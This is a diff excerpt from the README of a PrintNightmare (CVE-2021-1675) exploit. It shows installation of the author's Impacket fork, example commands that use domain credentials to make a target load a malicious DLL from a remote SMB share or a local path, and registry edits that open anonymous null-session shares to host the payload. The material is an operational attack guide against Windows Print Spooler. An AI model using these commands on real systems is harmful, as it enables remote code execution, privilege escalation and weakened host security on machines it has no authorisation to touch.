|
|
|
@ -13,6 +13,7 @@ Execute malicious DLL's remote or locally |
|
|
|
|
Before running the exploit you need to install my version of Impacket and after that you're gucci |
|
|
|
|
|
|
|
|
|
``` |
|
|
|
|
pip3 uninstall impacket |
|
|
|
|
git clone https://github.com/cube0x0/impacket |
|
|
|
|
cd impacket |
|
|
|
|
python3 ./setup.py install |
|
|
|
@ -45,6 +46,7 @@ connection: |
|
|
|
|
|
|
|
|
|
Example; |
|
|
|
|
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' |
|
|
|
|
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' |
|
|
|
|
``` |
|
|
|
|
|
|
|
|
|
### SMB configuration |
|
|
|
@ -79,5 +81,6 @@ REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v Null |
|
|
|
|
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f |
|
|
|
|
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f |
|
|
|
|
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f |
|
|
|
|
# Reboot |
|
|
|
|
``` |
|
|
|
|
|
|
|
|
|